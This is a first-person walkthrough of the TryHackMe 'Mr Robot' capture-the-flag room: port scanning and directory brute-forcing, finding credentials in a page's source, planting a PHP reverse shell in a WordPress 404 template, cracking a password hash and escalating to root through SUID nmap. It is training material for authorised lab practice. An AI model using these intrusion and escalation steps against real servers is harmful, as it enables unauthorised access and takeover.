Mr Robot


Platform: TryHackMe
Difficulty: Medium
Categories: Linux
Description: Based on the Mr.Robot show, can you root this box?
Attack OS: Parrot Linux
No spoilers!

1. Enumeration: There isn't much to go off of in the questions for this box, so we'll start with
	"nmap -sS -Pn -A -p -T4 -v $IP" where $IP is set to the IP of the target box. We find that the box is
	running apache httpd on ports 80 and 443 for http/https, and 22 for ssh.
nmap scan of Mr Robot box
 Now we can check the webpage,
	which has some interesting interactive elements but what's really interesting is the ever useful robots.txt
	directory. This contains our first key of three,
first key from robots.txt
 and a dictionary file. We can run gobuster in dir mode to
	find some new directories if given as wordlist input. The license endpoint returns a code of 200 and on view
	it pokes some fun at you expecting you to turn around, but let's take a look at the source anyway.
	A good look reveals an encoded string that we can glean a username and password from.
	Let's see if we can find a login page. /image brings us to a wordpress site that the credentials work on,
	giving us access to the admin panel. Here we can edit some things so lets try to get a php shell
	embedded and maybe get a foothold. The image upload is secure so we can't just upload a file there, but we
	still have permission to set and edit themes. Let's replace the 404.php template with a reverse shell and
	see if we can get a foothold through our listener
reverse shell foothold via 404 template
2. Exploitation and Foothold: The php shell worked and we now have a connection on our lister. We are signed in
	as a daemon and can poke around the system, using ls /home first. Robot's home folder has our next key, but
	access is denied. However this user has left a password hash accessible. let's crack it and switch to robot.
	with key #2 grabbed it's time to root.
cracking robot's password and grabbing key 2
3. Escalation: Now comfortably on the system, lets get a better shell with the help of python and run
	python -c 'import pty;pty.spawn("/bin/bash")'. Now lets try to find executables  with the SUID bit set with
	find / -perm /4000 2>/dev/null. nmap has the SUID bit set, let's try to escalate through it. GTFO bins comes
	to the rescue again with nmap --interactive followed by !bash, getting us root.
SUID nmap and GTFObins escalation path
 cd to the root home directory
	for the last key.
root flag, key 3
	Another box in the books!
room completed